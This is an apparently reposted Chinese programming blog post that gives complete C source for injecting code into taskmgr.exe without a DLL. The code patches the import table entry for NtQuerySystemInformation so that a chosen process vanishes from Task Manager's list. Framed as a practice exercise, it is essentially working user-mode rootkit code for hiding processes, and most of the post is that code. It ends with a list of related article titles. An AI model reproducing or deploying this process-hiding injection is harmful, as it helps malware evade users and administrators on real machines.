代码注入 API HOOK(非DLL)
来源:互联网 发布:美发淘宝店铺店招图片 编辑:程序博客网 时间:2024/06/10 17:19
使用代码注入来实现进程隐藏 而不是使用DLL注入来实现进程隐藏
没有什么高级技术 纯体力活 原理就不说了 只是没有通过DLL注入 来实现HOOK API
没有什么高级技术 纯体力活 原理就不说了 只是没有通过DLL注入 来实现HOOK API
从核心编程 以来 似乎 一提到C注入 就是DLL注入 很奇怪 为什么没人写个完整的代码注入
所以 自己动手写了下
纯粹注入代码 邪恶二进制上 也有个代码注入的 只是用了一个未公开的函数,我还看不懂
= =本来想用汇编写的 发现汇编注入代码远比C注入代码来的繁 所以用C实现了
纯粹注入代码 邪恶二进制上 也有个代码注入的 只是用了一个未公开的函数,我还看不懂
= =本来想用汇编写的 发现汇编注入代码远比C注入代码来的繁 所以用C实现了
主要功能就是 隐藏进程 不过RING3的似乎没多大用 练习而已
代码如下:后记:第一次没有照着书 打代码 也找不到C 注入代码的例子 能找到的都是DLL注入原理早就知道了 真的写一遍 不容易 整个编写的过程 碰到了很多问题 最终都解决了 轻松了
代码如下:
- //需要编译成release版本 DEBUG版本 对函数生成的跳转地址表
- //jmp xxxxx 写入远程进程的时候xxxxx等于写入了一个全局变量
- // 程序必然崩溃
- #include "Iat_Hook.h"
- char cPath[] = "taskmgr.exe";
- void main(void)
- {
- //定义变量
- DWORD dwPid;
- HANDLE hProcess;
- DWORD dwSize = 2048;
- PVOID pRemoteAddress, pRemoteStructAddress,MyAddress;
- REMOTESTRUCT stRemoteStruct;
- //遍历进程 寻找taskmgr.exe进程ID
- dwPid = GetProcessPid(cPath);
- // open process 得到进程句柄
- hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
- if(hProcess == NULL)
- {
- printf("open error code %d/n",GetLastError());
- return;
- }
- //写入 替代函数
- MyAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- WriteProcessMemory(hProcess, MyAddress, myNtQuerySystemInformation, dwSize, NULL);
- //初始化结构
- InitializeStruct(&stRemoteStruct, (DWORD)MyAddress, dwPid);
- //写入结构
- pRemoteStructAddress = VirtualAllocEx(hProcess, NULL, sizeof(REMOTESTRUCT), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- WriteProcessMemory(hProcess, pRemoteStructAddress, &stRemoteStruct, sizeof(REMOTESTRUCT), NULL);
- //写入远程线程函数
- pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- WriteProcessMemory(hProcess, pRemoteAddress, RemoteThread, dwSize, NULL);
- //创建远程线程
- CreateRemoteThread(hProcess, NULL, 0, pRemoteAddress,pRemoteStructAddress, 0, 0);
- CloseHandle(hProcess);
- }
- DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
- {
- FARPROC fpVirtualQuery;
- FARPROC fpVirtualProtect;
- FARPROC fpOpenProcess;
- FARPROC fpEnum;
- FARPROC fpGetProcAddress;
- FARPROC fpLoadLibrary;
- FARPROC fpFreeLibrary;
- FARPROC fpWriteMemory;
- FARPROC fplstrcmp;
- HANDLE hProcess = NULL;
- HMODULE hMods[256];
- DWORD dwNeed;
- HANDLE hPsapi;
- MEMORY_BASIC_INFORMATION stMem;
- HMODULE hKernel, hModule;
- PIMAGE_NT_HEADERS pImageNtHeaders;
- PIMAGE_OPTIONAL_HEADER pImageOptionalHeader;
- IMAGE_DATA_DIRECTORY ImageImport;
- PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor;
- PIMAGE_THUNK_DATA pImageThunkData;
- DWORD oldProtect;
- wchar_t *p = pRemoteStruct->cProcessName;
- //初始化函数指针
- fpVirtualQuery = (FARPROC)pRemoteStruct->dwVirtualQuery;
- fpVirtualProtect = (FARPROC)pRemoteStruct->dwVirtualProtect;
- fpOpenProcess = (FARPROC)pRemoteStruct->dwOpenProcess;
- fpLoadLibrary = (FARPROC)pRemoteStruct->dwLoadLibrary;
- fpFreeLibrary = (FARPROC)pRemoteStruct->dwFreeLibrary;
- fpGetProcAddress = (FARPROC)pRemoteStruct->dwGetProcAddress;
- fpWriteMemory = (FARPROC)pRemoteStruct->dwWriteProcessMemory;
- fplstrcmp = (FARPROC)pRemoteStruct->dwlstrcmp;
- //得到进程句柄
- hProcess =(HANDLE)fpOpenProcess(PROCESS_ALL_ACCESS, FALSE, pRemoteStruct->dwPid);
- if(!hProcess)
- return 0;
- //得到模块基址 模块基址存放于hMods[0]
- hPsapi = (HANDLE)fpLoadLibrary(pRemoteStruct->cDllName);
- fpEnum = (FARPROC)fpGetProcAddress(hPsapi, pRemoteStruct->cFunName);
- fpEnum(hProcess, hMods, sizeof(hMods), &dwNeed);
- fpFreeLibrary(hPsapi);
- hModule = hMods[0];
- //改变内存属性 因为采用的不是DLL插入 NtQuerySystemInformation的原始地址无法通过
- //全局变量传递给 替代函数 这里通过把函数地址写入kernel的PE头 来实现 这样只需要在替代函数中读出地址就可以了
- hKernel = (HANDLE)fpLoadLibrary(pRemoteStruct->cKernel);
- fpVirtualQuery(hKernel,&stMem, sizeof (MEMORY_BASIC_INFORMATION));
- fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);
- fpWriteMemory(hProcess, (PBYTE)(hKernel)+4, &pRemoteStruct->dwNtQuerySystem, sizeof(DWORD), NULL);
- fpWriteMemory(hProcess, (PBYTE)(hKernel)+8, &pRemoteStruct->dwlstrcmpW, sizeof(DWORD), NULL);
- fpWriteMemory(hProcess, (PBYTE)(hKernel)+0x14, &p, sizeof(DWORD), NULL);
- fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);
- //查找导入表 找到存放NtQuerySystemInformation
- pImageNtHeaders = (PIMAGE_NT_HEADERS)((DWORD)*((PBYTE)hModule+0x3c) + (DWORD)hModule);
- pImageOptionalHeader = &pImageNtHeaders->OptionalHeader;
- ImageImport = pImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
- pImageImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(ImageImport.VirtualAddress + (DWORD)hModule);
- while(pImageImportDescriptor->Name)
- {
- if(0 == fplstrcmp(pRemoteStruct->cNtdll, (PSTR)(pImageImportDescriptor->Name + (DWORD)hModule)))
- {
- break;
- }
- pImageImportDescriptor++;
- }
- //替换 NtQuerySystemInformation的地址
- pImageThunkData = (PIMAGE_THUNK_DATA)(pImageImportDescriptor->FirstThunk + (DWORD)hModule);
- while(pImageThunkData->u1.Function)
- {
- if(pImageThunkData->u1.Function == pRemoteStruct->dwNtQuerySystem)
- {
- fpVirtualQuery(&pImageThunkData->u1.Function, &stMem, sizeof (MEMORY_BASIC_INFORMATION));
- fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, PAGE_READWRITE, &stMem.Protect);
- pImageThunkData->u1.Function = pRemoteStruct->dwMyAddress;
- break;
- }
- pImageThunkData++;
- }
- fpVirtualProtect(stMem.BaseAddress, stMem.RegionSize, stMem.Protect, &oldProtect);
- return 0;
- }
- NTSTATUS WINAPI myNtQuerySystemInformation (
- SYSTEM_INFORMATION_CLASS SystemInformationClass,
- PVOID SystemInformation,
- ULONG SystemInformationLength,
- PULONG ReturnLength)
- {
- HANDLE hKernel;
- NTSTATUS ntStatus;
- wchar_t *pName;
- PSYSTEM_PROCESS_INFORMATION pCurrent, pForward;
- FARPROC fpNtQuerySystem;
- FARPROC fplstrcmpW;
- //寻找kernel32的基址 准备读取需要用到的函数地址
- _asm
- {
- mov eax,fs:[0x30]
- mov eax,[eax+0xc]
- mov ecx,[eax+0x1c]
- mov ecx, [ecx]
- mov eax, [ecx+8]
- mov hKernel,eax
- }
- //取得函数地址
- fpNtQuerySystem = *(FARPROC *)((DWORD)hKernel + 4);
- fplstrcmpW = *(FARPROC *)((DWORD)hKernel + 8);
- //取得 需隐藏的进程名
- pName = *(wchar_t **)((DWORD)hKernel + 0x14);
- ntStatus = (NTQUERYSYSTEMINFORMATION)fpNtQuerySystem(SystemInformationClass, SystemInformation, SystemInformationLength, ReturnLength);
- if (SystemProcessesAndThreadsInformation == SystemInformationClass)
- {
- pForward = NULL;
- pCurrent = (PSYSTEM_PROCESS_INFORMATION)SystemInformation;
- while(pCurrent->NextEntryDelta)//检验是否到 最后一个进程结构
- {
- if(pCurrent->ProcessName.Buffer)
- {
- //_asm int 3
- if(0 == fplstrcmpW(pCurrent->ProcessName.Buffer, pName))
- {
- if(pForward)
- {
- if(pCurrent->NextEntryDelta)//隐藏的进程在链表中间
- {
- pForward->NextEntryDelta += pCurrent->NextEntryDelta;
- }
- else//隐藏的进程在链表末端
- pForward->NextEntryDelta = 0;
- }
- else //要隐藏的进程在链表头时
- {
- if(pCurrent->NextEntryDelta)
- {
- SystemInformation = (PBYTE)pCurrent + pCurrent->NextEntryDelta;
- }
- else
- SystemInformation = NULL;
- }
- }
- }
- pForward = pCurrent;
- pCurrent = (PSYSTEM_PROCESS_INFORMATION)(pCurrent->NextEntryDelta + (PBYTE)pForward);
- }
- //_asm int 3
- }
- return ntStatus;
- }
- //得到进程PID
- DWORD GetProcessPid(char *cPath)
- {
- PROCESSENTRY32 stProcess;
- HANDLE hSnap;
- BOOL bRet;
- hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- if(hSnap == INVALID_HANDLE_VALUE)
- {
- printf("error/n");
- return 0;
- }
- stProcess.dwSize = sizeof (PROCESSENTRY32);
- bRet = Process32First(hSnap, &stProcess);
- if(!bRet)
- {
- printf("first error/n");
- return 0;
- }
- do
- {
- if(0 == strcmp(stProcess.szExeFile, cPath)) //find process of target
- {
- break;
- }
- }while(Process32Next(hSnap, &stProcess));
- //确认 是否找到 目标进程
- if(0 != strcmp(stProcess.szExeFile, "taskmgr.exe"))
- {
- printf("can not find process/n");
- return 0;
- }
- CloseHandle(hSnap);
- return stProcess.th32ProcessID;
- }
- VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid)
- {
- HANDLE hNtdll;
- HANDLE hKernel;
- hNtdll = LoadLibrary("ntdll.dll");
- pRemoteStruct->dwNtQuerySystem = (DWORD)GetProcAddress(hNtdll, "NtQuerySystemInformation");
- FreeLibrary(hNtdll);
- hKernel = LoadLibrary("kernel32.dll");
- pRemoteStruct->dwVirtualProtect = (DWORD)GetProcAddress(hKernel, "VirtualProtect");
- pRemoteStruct->dwVirtualQuery = (DWORD)GetProcAddress(hKernel, "VirtualQuery");
- pRemoteStruct->dwOpenProcess = (DWORD)GetProcAddress(hKernel, "OpenProcess");
- pRemoteStruct->dwGetProcAddress = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
- pRemoteStruct->dwFreeLibrary = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
- pRemoteStruct->dwLoadLibrary = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
- pRemoteStruct->dwWriteProcessMemory = (DWORD)GetProcAddress(hKernel, "WriteProcessMemory");
- pRemoteStruct->dwlstrcmp = (DWORD)GetProcAddress(hKernel, "lstrcmpA");
- pRemoteStruct->dwlstrcmpW = (DWORD)GetProcAddress(hKernel, "lstrcmpW");
- FreeLibrary(hKernel);
- pRemoteStruct->dwMyAddress = MyAddress;
- pRemoteStruct->dwPid = dwPid;
- strcpy(pRemoteStruct->cDllName, "Psapi.dll");
- strcpy(pRemoteStruct->cFunName, "EnumProcessModules");
- strcpy(pRemoteStruct->cKernel,"Kernel32.dll");
- strcpy(pRemoteStruct->cNtdll, "ntdll.dll");
- //要隐藏的进程名
- wcscpy(pRemoteStruct->cProcessName, L"explorer.exe");
- }
- Iat_Hook.h
- //头文件
- #include <windows.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <tlhelp32.h>
- #include <imagehlp.h>
- #include "Winternl.h"
- #pragma comment(lib, "imagehlp")
- //类型声明
- typedef int NTSTATUS;
- typedef BOOL (__stdcall *ENUMPROCESSMODULES)(
- HANDLE hProcess,
- HMODULE* lphModule,
- DWORD cb,
- LPDWORD lpcbNeeded
- );
- typedef NTSTATUS (WINAPI *NTQUERYSYSTEMINFORMATION)(
- SYSTEM_INFORMATION_CLASS SystemInformationClass,
- PVOID SystemInformation,
- ULONG SystemInformationLength,
- PULONG ReturnLength
- );
- typedef struct _REMOTE_STRUCT
- {
- DWORD dwNtQuerySystem;
- DWORD dwVirtualQuery;
- DWORD dwVirtualProtect;
- DWORD dwOpenProcess;
- DWORD dwMessageBox;
- DWORD dwLoadLibrary;
- DWORD dwGetProcAddress;
- DWORD dwFreeLibrary;
- DWORD dwWriteProcessMemory;
- DWORD dwlstrcmp;
- DWORD dwlstrcmpW;
- DWORD dwEnum;
- DWORD dwMyAddress;
- DWORD dwPid;
- char cDllName[50];
- char cFunName[50];
- char cKernel[50];
- char cNtdll[50];
- wchar_t cProcessName[50];//要隐藏的进程名
- }REMOTESTRUCT, *PREMOTESTRUCT;
- //函数声明
- DWORD GetProcessPid(char *cPath);
- DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct);
- VOID InitializeStruct(PREMOTESTRUCT pRemoteStruct, DWORD MyAddress, DWORD dwPid);
- NTSTATUS WINAPI myNtQuerySystemInformation (
- SYSTEM_INFORMATION_CLASS SystemInformationClass,
- PVOID SystemInformation,
- ULONG SystemInformationLength,
- PULONG ReturnLength);
- Winternl.h
- typedef struct _UNICODE_STRING {
- USHORT Length;
- USHORT MaximumLength;
- PWSTR Buffer; //注意,这里为Unicode类型
- } UNICODE_STRING, *PUNICODE_STRING;
- typedef enum _SYSTEM_INFORMATION_CLASS {
- SystemBasicInformation,
- SystemProcessorInformation,
- SystemPerformanceInformation,
- SystemTimeOfDayInformation,
- SystemNotImplemented1,
- SystemProcessesAndThreadsInformation,
- SystemCallCounts,
- SystemConfigurationInformation,
- SystemProcessorTimes,
- SystemGlobalFlag,
- SystemNotImplemented2,
- SystemModuleInformation,
- SystemLockInformation,
- SystemNotImplemented3,
- SystemNotImplemented4,
- SystemNotImplemented5,
- SystemHandleInformation,
- SystemObjectInformation,
- SystemPagefileInformation,
- SystemInstructionEmulationCounts,
- SystemInvalidInfoClass1,
- SystemCacheInformation,
- SystemPoolTagInformation,
- SystemProcessorStatistics,
- SystemDpcInformation,
- SystemNotImplemented6,
- SystemLoadImage,
- SystemUnloadImage,
- SystemTimeAdjustment,
- SystemNotImplemented7,
- SystemNotImplemented8,
- SystemNotImplemented9,
- SystemCrashDumpInformation,
- SystemExceptionInformation,
- SystemCrashDumpStateInformation,
- SystemKernelDebuggerInformation,
- SystemContextSwitchInformation,
- SystemRegistryQuotaInformation,
- SystemLoadAndCallImage,
- SystemPrioritySeparation,
- SystemNotImplemented10,
- SystemNotImplemented11,
- SystemInvalidInfoClass2,
- SystemInvalidInfoClass3,
- SystemTimeZoneInformation,
- SystemLookasideInformation,
- SystemSetTimeSlipEvent,
- SystemCreateSession,
- SystemDeleteSession,
- SystemInvalidInfoClass4,
- SystemRangeStartInformation,
- SystemVerifierInformation,
- SystemAddVerifier,
- SystemSessionProcessesInformation
- } SYSTEM_INFORMATION_CLASS;
- typedef struct _SYSTEM_PROCESS_INFORMATION
- {
- DWORD NextEntryDelta;
- DWORD dThreadCount;
- DWORD dReserved01;
- DWORD dReserved02;
- DWORD dReserved03;
- DWORD dReserved04;
- DWORD dReserved05;
- DWORD dReserved06;
- FILETIME ftCreateTime; /* relative to 01-01-1601 */
- FILETIME ftUserTime; /* 100 nsec units */
- FILETIME ftKernelTime; /* 100 nsec units */
- UNICODE_STRING ProcessName; //这就是进程名
- DWORD BasePriority;
- DWORD dUniqueProcessId; //进程ID
- DWORD dParentProcessID;
- DWORD dHandleCount;
- DWORD dReserved07;
- DWORD dReserved08;
- DWORD VmCounters;
- DWORD dCommitCharge;
- PVOID ThreadInfos[1];
- } SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
- 代码注入 API HOOK(非DLL)
- 代码注入 API HOOK(非DLL)[转]
- IAT HOOK 代码注入非DLL
- IAT HOOK 代码注入非DLL
- HOOK API DLL 注入
- HOOK API DLL 注入
- Windows Dll注入与API HOOK
- 利用钩子注入DLL进而HOOK API的防范
- Delphi进程注入的部分代码 (非DLL注入)
- 关于dll注入的hook
- R3进程DLL注入HOOK
- 注入Hook技术 -- DLL注入
- API hook原理和实例快速入门(inline hook),以dll线程注入方式使用(win7-64bit)
- API hook原理和实例快速入门(inline hook),以dll线程注入方式使用(win7-64bit)
- API hook原理和实例快速入门(inline hook),以dll线程注入方式使用(win7-64bit)
- API hook原理和实例快速入门(inline hook),以dll线程注入方式使用(win7-64bit)
- Delphi利用CreateRemoteThread远程注入 详细 (非dll注入,是代码注入)
- HOOK API 完整代码
- 人首先是一个接受者,然后才是一个付出者
- 决定了
- 被预言的经济危机
- ManagementClass的调用
- 开始写点什么
- 代码注入 API HOOK(非DLL)
- 子网划分方法及掩码简便算法
- 2008-10-13 XEIM 2.0 beta 准时发布
- 运行命令
- 回首十年——从程序员到 CTO(转)
- 胡润发布女富豪榜:史玉柱之女上榜
- 小朋友
- Oracle异常
- 构建可扩展的JavaEE应用(一)